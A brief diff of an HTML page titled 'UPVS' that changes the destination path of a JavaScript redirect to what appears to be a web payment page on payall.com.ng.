--- a/index.html
+++ b/index.html
@@ -10,7 +10,7 @@
 	<meta charset="UTF-8">
 	<script>
 function myFunction() {
-  location.replace("https://payall.com.ng/upvs-webpay/")
+  location.replace("https://payall.com.ng/upvs-webpay22/")
 }
 </script>
 	<title>UPVS</title>
